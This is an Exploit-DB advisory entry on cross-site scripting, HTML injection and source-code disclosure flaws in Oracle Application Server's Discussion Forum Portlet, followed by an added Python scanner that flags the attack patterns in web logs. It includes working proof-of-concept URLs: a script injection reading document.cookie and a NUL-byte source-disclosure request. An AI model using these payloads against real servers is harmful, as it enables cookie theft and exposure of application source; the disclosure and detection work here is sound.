Oracle Application Server Discussion Forum Portlet Multiple Vulnerabilities

2005-12-23T00:00:00
ID EDB-ID:26972
Type exploitdb
Reporter Johannes Greil
Modified 2005-12-23T00:00:00

Description

Oracle Application Server Discussion Forum Portlet Multiple Remote Vulnerabilities. CVE-2005-4550. Webapps exploit for jsp platform

                                        
source: http://www.securityfocus.com/bid/16048/info

Oracle Application Server Discussion Forum Portlet is affected by multiple remote vulnerabilities.

The following specific vulnerabilities were identified:

The application is prone to a cross-site scripting vulnerability.

Discussion Forum Portlet is also affected by multiple HTML injection vulnerabilities.

The application is vulnerable to a source code disclosure vulnerability as well.

All versions of Oracle Application Server Discussion Forum Portlet are considered vulnerable. Note that Oracle Application Server Discussion Forum Portlet is not meant to be used in a production environment.

Cross-site scripting:
http://www.example.com/portal/page?_pageid=XXX,XXX&_dad=portal&_schema=PORTAL&
df_next_page=htdocs/forums.jsp&
RowKeyValue=<script>alert(document.cookie)</script>

Source code disclosure:
http://www.example.com/portal/page?_pageid=XXX,XXX&_dad=portal&_schema=PORTAL&
df_next_page=htdocs/search.jsp%00
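
A log check for the two request patterns shown above, as an added example that is not part of the original advisory: it flags a NUL byte in `df_next_page` and HTML markup characters in `RowKeyValue`, and goes slightly beyond the advisory by also decoding double-encoded values. The Common Log Format input, the finding labels and the sample entries are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line of a Common Log Format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(r'[<>"\']')  # characters that let a value break into HTML

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%2500) is caught too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(target):
    """Return sorted findings for one request target; parse_qsl decodes once."""
    findings = set()
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = fully_decode(value)
        if name == "df_next_page" and "\x00" in value:
            findings.add("nul-byte-in-df_next_page")
        if name == "RowKeyValue" and MARKUP_RE.search(value):
            findings.add("markup-in-RowKeyValue")
    return sorted(findings)

def scan(lines):
    """Return (line number, findings) for every log line with a finding."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        found = classify(match.group(1)) if match else []
        if found:
            hits.append((lineno, found))
    return hits

# Constructed sample entries (not real traffic); host and timestamps are made up.
_PRE = '192.0.2.10 - - [23/Dec/2005:10:00:00 +0000] "GET /portal/page?_pageid=1,1&_dad=portal&_schema=PORTAL&df_next_page=htdocs/'
SAMPLE_LOG = [
    _PRE + 'forums.jsp&RowKeyValue=42 HTTP/1.1" 200 5120',
    _PRE + 'forums.jsp&RowKeyValue=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5200',
    _PRE + 'search.jsp%00 HTTP/1.1" 200 9100',
    _PRE + 'search.jsp%2500 HTTP/1.1" 200 9100',
]

if __name__ == "__main__":
    for lineno, found in scan(SAMPLE_LOG):
        print(lineno, ", ".join(found))
```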